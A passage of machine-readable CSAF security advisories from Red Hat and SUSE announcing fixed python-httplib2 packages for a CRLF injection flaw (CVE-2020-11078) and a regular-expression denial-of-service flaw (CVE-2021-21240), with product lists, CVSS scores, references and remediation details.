Storage (RHCS) version 2. Ceph-2 has reached End of Extended Life Cycle Support and no longer fixing moderates/lows.\n\nThere's currently no known vector to exploit this when using Python versions with CVE-2019-9740 and CVE-2019-9947 fixed.\n\nIn Red Hat OpenStack Platform13, because the flaw has a lower impact and the package's indirect usage in RHOSP cannot be exploited, no update will be provided at this time for the RHOSP python-httplib2 package.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2020-11078", }, { category: "external", summary: "RHBZ#1845937", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1845937", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2020-11078", url: "https://www.cve.org/CVERecord?id=CVE-2020-11078", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2020-11078", url: "https://nvd.nist.gov/vuln/detail/CVE-2020-11078", }, { category: "external", summary: "https://github.com/httplib2/httplib2/security/advisories/GHSA-gg84-qgv9-w4pq", url: "https://github.com/httplib2/httplib2/security/advisories/GHSA-gg84-qgv9-w4pq", }, ], release_date: "2020-05-20T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2021-05-26T11:48:28+00:00", details: "For details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2021:2116", }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.8, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N", version: "3.1", }, products: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "python-httplib2: CRLF injection via an attacker controlled unescaped part of uri for httplib2.Http.request function", }, { cve: "CVE-2021-21240", cwe: { id: "CWE-400", name: "Uncontrolled Resource Consumption", }, discovery_date: "2021-02-09T00:00:00+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "1926885", }, ], notes: [ { category: "description", text: "An uncontrolled resource consumption flaw as found in python-httplib2, due to a flawed regular expression used while parsing the WWW-Authenticate header in an HTTP response. This flaw allows a malicious or compromised server to reply with a crafted sequence of characters in the WWW-Authenticate header, leading to a denial of service of the httplib2 client accessing the server. The highest threat from this vulnerability is to system availability.", title: "Vulnerability description", }, { category: "summary", text: "python-httplib2: Regular expression denial of service via malicious header", title: "Vulnerability summary", }, { category: "other", text: "This flaw has been rated as having a security impact of Low, because it requires a malicious or compromised server in order to be exploited, and it only affects the HTTP client. In Red Hat OpenStack Platform 13, because the flaw has a lower impact and the fix would require a substantial amount of development, no update will be provided at this time for the RHOSP 13 python-httplib2 package.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2021-21240", }, { category: "external", summary: "RHBZ#1926885", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1926885", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2021-21240", url: "https://www.cve.org/CVERecord?id=CVE-2021-21240", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2021-21240", url: "https://nvd.nist.gov/vuln/detail/CVE-2021-21240", }, { category: "external", summary: "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m", url: "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m", }, ], release_date: "2021-01-09T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2021-05-26T11:48:28+00:00", details: "For details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2021:2116", }, { category: "workaround", details: "Use strict mode to parse WWW-Authenticate headers. This can be done by setting `httplib2.USE_WWW_AUTH_STRICT_PARSING = True`. Please note, however, that strict mode might lead to bad results in case of ill-formed header values.", product_ids: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], }, ], threats: [ { category: "impact", details: "Low", }, ], title: "python-httplib2: Regular expression denial of service via malicious header", }, ], }
rhsa-2021_2116
Vulnerability from csaf_redhat
Published
2021-05-26 11:48
Modified
2024-11-22 16:41
Summary
Red Hat Security Advisory: Red Hat OpenStack Platform 16.1.6 (python-httplib2) security update
Notes
Topic
An update for python-httplib2 is now available for Red Hat OpenStack
Platform 16.1 (Train).
Red Hat Product Security has rated this update as having a security impact
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.
Details
A comprehensive HTTP client library that supports many features left out of other HTTP libraries.
Security Fix(es):
* CRLF injection via an attacker controlled unescaped part of uri for
httplib2.Http.request function (CVE-2020-11078)
* Regular expression denial of service via malicious header
(CVE-2021-21240)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Moderate", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "An update for python-httplib2 is now available for Red Hat OpenStack\nPlatform 16.1 (Train).\n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section.", title: "Topic", }, { category: "general", text: "A comprehensive HTTP client library that supports many features left out of other HTTP libraries.\n\nSecurity Fix(es):\n\n* CRLF injection via an attacker controlled unescaped part of uri for\nhttplib2.Http.request function (CVE-2020-11078)\n\n* Regular expression denial of service via malicious header\n(CVE-2021-21240)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage listed in the References section.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2021:2116", url: "https://access.redhat.com/errata/RHSA-2021:2116", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#moderate", url: "https://access.redhat.com/security/updates/classification/#moderate", }, { category: "external", summary: "1845937", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1845937", }, { category: "external", summary: "1926885", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1926885", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_2116.json", }, ], title: "Red Hat Security Advisory: Red Hat OpenStack Platform 16.1.6 (python-httplib2) security update", tracking: { current_release_date: "2024-11-22T16:41:45+00:00", generator: { date: "2024-11-22T16:41:45+00:00", engine: { name: "Red Hat SDEngine", version: "4.2.1", }, }, id: "RHSA-2021:2116", initial_release_date: "2021-05-26T11:48:28+00:00", revision_history: [ { date: "2021-05-26T11:48:28+00:00", number: "1", summary: "Initial version", }, { date: "2021-05-26T11:48:28+00:00", number: "2", summary: "Last updated version", }, { date: "2024-11-22T16:41:45+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "Red Hat OpenStack Platform 16.1", product: { name: "Red Hat OpenStack Platform 16.1", product_id: "8Base-RHOS-CINDERLIB-16.1", product_identification_helper: { cpe: "cpe:/a:redhat:openstack:16.1::el8", }, }, }, ], category: "product_family", name: "Red Hat OpenStack Platform", }, { branches: [ { category: "product_version", name: "python-httplib2-0:0.13.1-2.el8ost.src", product: { name: "python-httplib2-0:0.13.1-2.el8ost.src", product_id: "python-httplib2-0:0.13.1-2.el8ost.src", product_identification_helper: { purl: "pkg:rpm/redhat/python-httplib2@0.13.1-2.el8ost?arch=src", }, }, }, ], category: "architecture", name: "src", }, { branches: [ { category: "product_version", name: "python3-httplib2-0:0.13.1-2.el8ost.noarch", product: { name: "python3-httplib2-0:0.13.1-2.el8ost.noarch", product_id: "python3-httplib2-0:0.13.1-2.el8ost.noarch", product_identification_helper: { purl: "pkg:rpm/redhat/python3-httplib2@0.13.1-2.el8ost?arch=noarch", }, }, }, ], category: "architecture", name: "noarch", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "python-httplib2-0:0.13.1-2.el8ost.src as a component of Red Hat OpenStack Platform 16.1", product_id: "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", }, product_reference: "python-httplib2-0:0.13.1-2.el8ost.src", relates_to_product_reference: "8Base-RHOS-CINDERLIB-16.1", }, { category: "default_component_of", full_product_name: { name: "python3-httplib2-0:0.13.1-2.el8ost.noarch as a component of Red Hat OpenStack Platform 16.1", product_id: "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", }, product_reference: "python3-httplib2-0:0.13.1-2.el8ost.noarch", relates_to_product_reference: "8Base-RHOS-CINDERLIB-16.1", }, ], }, vulnerabilities: [ { cve: "CVE-2020-11078", cwe: { id: "CWE-113", name: "Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')", }, discovery_date: "2020-05-20T00:00:00+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "1845937", }, ], notes: [ { category: "description", text: "A flaw was found in python-httplib2. An attacker controlling an unescaped part of uri for `httplib2.Http.request()` could change request headers and body, send additional hidden requests to same server. This vulnerability impacts software that uses httplib2 with uri constructed by string concatenation, as opposed to proper urllib building with escaping.", title: "Vulnerability description", }, { category: "summary", text: "python-httplib2: CRLF injection via an attacker controlled unescaped part of uri for httplib2.Http.request function", title: "Vulnerability summary", }, { category: "other", text: "While Red Hat Quay 3.0, and 3.1 used the httplib2 library it was removed in versions 3.2 and later. Upgrade to 3.2 or later to fix this vulnerability in Red Hat Quay.\n\nRed Hat Gluster Storage 3 delivers the affected version of the python-httplib2 library. However the library is not used by Gluster hence the impact by this vulnerability is low.\n\nThis issue affects the version of the python-httplib2 library as shipped with Red Hat Ceph Storage (RHCS) version 2. Ceph-2 has reached End of Extended Life Cycle Support and no longer fixing moderates/lows.\n\nThere's currently no known vector to exploit this when using Python versions with CVE-2019-9740 and CVE-2019-9947 fixed.\n\nIn Red Hat OpenStack Platform13, because the flaw has a lower impact and the package's indirect usage in RHOSP cannot be exploited, no update will be provided at this time for the RHOSP python-httplib2 package.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2020-11078", }, { category: "external", summary: "RHBZ#1845937", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1845937", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2020-11078", url: "https://www.cve.org/CVERecord?id=CVE-2020-11078", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2020-11078", url: "https://nvd.nist.gov/vuln/detail/CVE-2020-11078", }, { category: "external", summary: "https://github.com/httplib2/httplib2/security/advisories/GHSA-gg84-qgv9-w4pq", url: "https://github.com/httplib2/httplib2/security/advisories/GHSA-gg84-qgv9-w4pq", }, ], release_date: "2020-05-20T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2021-05-26T11:48:28+00:00", details: "For details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2021:2116", }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.8, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N", version: "3.1", }, products: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "python-httplib2: CRLF injection via an attacker controlled unescaped part of uri for httplib2.Http.request function", }, { cve: "CVE-2021-21240", cwe: { id: "CWE-400", name: "Uncontrolled Resource Consumption", }, discovery_date: "2021-02-09T00:00:00+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "1926885", }, ], notes: [ { category: "description", text: "An uncontrolled resource consumption flaw as found in python-httplib2, due to a flawed regular expression used while parsing the WWW-Authenticate header in an HTTP response. This flaw allows a malicious or compromised server to reply with a crafted sequence of characters in the WWW-Authenticate header, leading to a denial of service of the httplib2 client accessing the server. The highest threat from this vulnerability is to system availability.", title: "Vulnerability description", }, { category: "summary", text: "python-httplib2: Regular expression denial of service via malicious header", title: "Vulnerability summary", }, { category: "other", text: "This flaw has been rated as having a security impact of Low, because it requires a malicious or compromised server in order to be exploited, and it only affects the HTTP client. In Red Hat OpenStack Platform 13, because the flaw has a lower impact and the fix would require a substantial amount of development, no update will be provided at this time for the RHOSP 13 python-httplib2 package.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2021-21240", }, { category: "external", summary: "RHBZ#1926885", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1926885", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2021-21240", url: "https://www.cve.org/CVERecord?id=CVE-2021-21240", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2021-21240", url: "https://nvd.nist.gov/vuln/detail/CVE-2021-21240", }, { category: "external", summary: "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m", url: "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m", }, ], release_date: "2021-01-09T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2021-05-26T11:48:28+00:00", details: "For details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2021:2116", }, { category: "workaround", details: "Use strict mode to parse WWW-Authenticate headers. This can be done by setting `httplib2.USE_WWW_AUTH_STRICT_PARSING = True`. Please note, however, that strict mode might lead to bad results in case of ill-formed header values.", product_ids: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], }, ], threats: [ { category: "impact", details: "Low", }, ], title: "python-httplib2: Regular expression denial of service via malicious header", }, ], }
suse-su-2021:1806-1
Vulnerability from csaf_suse
Published
2021-05-31 14:23
Modified
2021-05-31 14:23
Summary
Security update for python-httplib2
Notes
Title of the patch
Security update for python-httplib2
Description of the patch
This update for python-httplib2 fixes the following issues:
- Update to version 0.19.0 (bsc#1182053).
- CVE-2021-21240: Fixed regular expression denial of service via malicious header (bsc#1182053).
- CVE-2020-11078: Fixed unescaped part of uri where an attacker could change request headers and body (bsc#1182053).
Patchnames
SUSE-2021-1806,SUSE-SLE-Module-Basesystem-15-SP2-2021-1806,SUSE-SLE-Module-Basesystem-15-SP3-2021-1806,SUSE-SLE-Module-Packagehub-Subpackages-15-SP2-2021-1806,SUSE-SLE-Module-Packagehub-Subpackages-15-SP3-2021-1806
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{ document: { aggregate_severity: { namespace: "https://www.suse.com/support/security/rating/", text: "moderate", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright 2024 SUSE LLC. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Security update for python-httplib2", title: "Title of the patch", }, { category: "description", text: "This update for python-httplib2 fixes the following issues:\n\n- Update to version 0.19.0 (bsc#1182053).\n- CVE-2021-21240: Fixed regular expression denial of service via malicious header (bsc#1182053).\n- CVE-2020-11078: Fixed unescaped part of uri where an attacker could change request headers and body (bsc#1182053).\n", title: "Description of the patch", }, { category: "details", text: "SUSE-2021-1806,SUSE-SLE-Module-Basesystem-15-SP2-2021-1806,SUSE-SLE-Module-Basesystem-15-SP3-2021-1806,SUSE-SLE-Module-Packagehub-Subpackages-15-SP2-2021-1806,SUSE-SLE-Module-Packagehub-Subpackages-15-SP3-2021-1806", title: "Patchnames", }, { category: "legal_disclaimer", text: "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", title: "Terms of use", }, ], publisher: { category: "vendor", contact_details: "https://www.suse.com/support/security/contact/", name: "SUSE Product Security Team", namespace: "https://www.suse.com/", }, references: [ { category: "external", summary: "SUSE ratings", url: "https://www.suse.com/support/security/rating/", }, { category: "self", summary: "URL of this CSAF notice", url: "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2021_1806-1.json", }, { category: "self", summary: "URL for SUSE-SU-2021:1806-1", url: "https://www.suse.com/support/update/announcement/2021/suse-su-20211806-1/", }, { category: "self", summary: "E-Mail link for SUSE-SU-2021:1806-1", url: "https://lists.suse.com/pipermail/sle-security-updates/2021-May/008895.html", }, { category: "self", summary: "SUSE Bug 1171998", url: "https://bugzilla.suse.com/1171998", }, { category: "self", summary: "SUSE Bug 1182053", url: "https://bugzilla.suse.com/1182053", }, { category: "self", summary: "SUSE CVE CVE-2020-11078 page", url: "https://www.suse.com/security/cve/CVE-2020-11078/", }, { category: "self", summary: "SUSE CVE CVE-2021-21240 page", url: "https://www.suse.com/security/cve/CVE-2021-21240/", }, ], title: "Security update for python-httplib2", tracking: { current_release_date: "2021-05-31T14:23:28Z", generator: { date: "2021-05-31T14:23:28Z", engine: { name: "cve-database.git:bin/generate-csaf.pl", version: "1", }, }, id: "SUSE-SU-2021:1806-1", initial_release_date: "2021-05-31T14:23:28Z", revision_history: [ { date: "2021-05-31T14:23:28Z", number: "1", summary: "Current version", }, ], status: "final", version: "1", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_version", name: "python2-httplib2-0.19.0-3.3.1.noarch", product: { name: "python2-httplib2-0.19.0-3.3.1.noarch", product_id: "python2-httplib2-0.19.0-3.3.1.noarch", }, }, { category: "product_version", name: "python3-httplib2-0.19.0-3.3.1.noarch", product: { name: "python3-httplib2-0.19.0-3.3.1.noarch", product_id: "python3-httplib2-0.19.0-3.3.1.noarch", }, }, ], category: "architecture", name: "noarch", }, { branches: [ { category: "product_name", name: "SUSE Linux Enterprise Module for Basesystem 15 SP2", product: { name: "SUSE Linux Enterprise Module for Basesystem 15 SP2", product_id: "SUSE Linux Enterprise Module for Basesystem 15 SP2", product_identification_helper: { cpe: "cpe:/o:suse:sle-module-basesystem:15:sp2", }, }, }, { category: "product_name", name: "SUSE Linux Enterprise Module for Basesystem 15 SP3", product: { name: "SUSE Linux Enterprise Module for Basesystem 15 SP3", product_id: "SUSE Linux Enterprise Module for Basesystem 15 SP3", product_identification_helper: { cpe: "cpe:/o:suse:sle-module-basesystem:15:sp3", }, }, }, { category: "product_name", name: "SUSE Linux Enterprise Module for Package Hub 15 SP2", product: { name: "SUSE Linux Enterprise Module for Package Hub 15 SP2", product_id: "SUSE Linux Enterprise Module for Package Hub 15 SP2", product_identification_helper: { cpe: "cpe:/o:suse:packagehub:15:sp2", }, }, }, { category: "product_name", name: "SUSE Linux Enterprise Module for Package Hub 15 SP3", product: { name: "SUSE Linux Enterprise Module for Package Hub 15 SP3", product_id: "SUSE Linux Enterprise Module for Package Hub 15 SP3", product_identification_helper: { cpe: "cpe:/o:suse:packagehub:15:sp3", }, }, }, ], category: "product_family", name: "SUSE Linux Enterprise", }, ], category: "vendor", name: "SUSE", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "python3-httplib2-0.19.0-3.3.1.noarch as component of SUSE Linux Enterprise Module for Basesystem 15 SP2", product_id: "SUSE Linux Enterprise Module for Basesystem 15 SP2:python3-httplib2-0.19.0-3.3.1.noarch", }, product_reference: "python3-httplib2-0.19.0-3.3.1.noarch", relates_to_product_reference: "SUSE Linux Enterprise Module for Basesystem 15 SP2", }, { category: "default_component_of", full_product_name: { name: "python3-httplib2-0.19.0-3.3.1.noarch as component of SUSE Linux Enterprise Module for Basesystem 15 SP3", product_id: "SUSE Linux Enterprise Module for Basesystem 15 SP3:python3-httplib2-0.19.0-3.3.1.noarch", }, product_reference: "python3-httplib2-0.19.0-3.3.1.noarch", relates_to_product_reference: "SUSE Linux Enterprise Module for Basesystem 15 SP3", }, { category: "default_component_of", full_product_name: { name: "python2-httplib2-0.19.0-3.3.1.noarch as component of SUSE Linux Enterprise Module for Package Hub 15 SP2", product_id: "SUSE Linux Enterprise Module for Package Hub 15 SP2:python2-httplib2-0.19.0-3.3.1.noarch", }, product_reference: "python2-httplib2-0.19.0-3.3.1.noarch", relates_to_product_reference: "SUSE Linux Enterprise Module for Package Hub 15 SP2", }, { category: "default_component_of", full_product_name: { name: "python2-httplib2-0.19.0-3.3.1.noarch as component of SUSE Linux Enterprise Module for Package Hub 15 SP3", product_id: "SUSE Linux Enterprise Module for Package Hub 15 SP3:python2-httplib2-0.19.0-3.3.1.noarch", }, product_reference: "python2-httplib2-0.19.0-3.3.1.noarch", relates_to_product_reference: "SUSE Linux Enterprise Module for Package Hub 15 SP3", }, ], }, vulnerabilities: [ { cve: "CVE-2020-11078", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2020-11078", }, ], notes: [ { category: "general", text: "In httplib2 before version 0.18.0, an attacker controlling unescaped part of uri for `httplib2.Http.request()` could change request headers and body, send additional hidden requests to same server. This vulnerability impacts software that uses httplib2 with uri constructed by string concatenation, as opposed to proper urllib building with escaping. This has been fixed in 0.18.0.", title: "CVE description", }, ], product_status: { recommended: [ "SUSE Linux Enterprise Module for Basesystem 15 SP2:python3-httplib2-0.19.0-3.3.1.noarch", "SUSE Linux Enterprise Module for Basesystem 15 SP3:python3-httplib2-0.19.0-3.3.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP2:python2-httplib2-0.19.0-3.3.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP3:python2-httplib2-0.19.0-3.3.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2020-11078", url: "https://www.suse.com/security/cve/CVE-2020-11078", }, { category: "external", summary: "SUSE Bug 1171998 for CVE-2020-11078", url: "https://bugzilla.suse.com/1171998", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "SUSE Linux Enterprise Module for Basesystem 15 SP2:python3-httplib2-0.19.0-3.3.1.noarch", "SUSE Linux Enterprise Module for Basesystem 15 SP3:python3-httplib2-0.19.0-3.3.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP2:python2-httplib2-0.19.0-3.3.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP3:python2-httplib2-0.19.0-3.3.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 6.8, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N", version: "3.1", }, products: [ "SUSE Linux Enterprise Module for Basesystem 15 SP2:python3-httplib2-0.19.0-3.3.1.noarch", "SUSE Linux Enterprise Module for Basesystem 15 SP3:python3-httplib2-0.19.0-3.3.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP2:python2-httplib2-0.19.0-3.3.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP3:python2-httplib2-0.19.0-3.3.1.noarch", ], }, ], threats: [ { category: "impact", date: "2021-05-31T14:23:28Z", details: "moderate", }, ], title: "CVE-2020-11078", }, { cve: "CVE-2021-21240", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2021-21240", }, ], notes: [ { category: "general", text: "httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.", title: "CVE description", }, ], product_status: { recommended: [ "SUSE Linux Enterprise Module for Basesystem 15 SP2:python3-httplib2-0.19.0-3.3.1.noarch", "SUSE Linux Enterprise Module for Basesystem 15 SP3:python3-httplib2-0.19.0-3.3.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP2:python2-httplib2-0.19.0-3.3.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP3:python2-httplib2-0.19.0-3.3.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2021-21240", url: "https://www.suse.com/security/cve/CVE-2021-21240", }, { category: "external", summary: "SUSE Bug 1182053 for CVE-2021-21240", url: "https://bugzilla.suse.com/1182053", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "SUSE Linux Enterprise Module for Basesystem 15 SP2:python3-httplib2-0.19.0-3.3.1.noarch", "SUSE Linux 